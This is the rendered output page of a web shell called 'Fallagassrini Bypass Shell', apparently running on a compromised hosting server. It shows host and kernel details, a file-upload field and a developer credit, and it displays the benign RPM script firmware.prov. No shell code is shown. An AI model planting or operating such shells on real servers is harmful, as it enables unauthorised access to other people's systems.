? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /lib/rpm/redhat/find-provides.d/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : //lib/rpm/redhat/find-provides.d/firmware.prov

#!/bin/sh
#
# firmware.prov - Automatically extract any and all firmware dependencies from
#                 kernel object (.ko) files and add to RPM deps.

IFS=$'\n'

for module in $(grep -E '/lib/modules/.+\.ko$') $*;
do
    for firmware in `/sbin/modinfo -F firmware $module`;
    do
        echo "firmware($firmware)"
    done
done

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net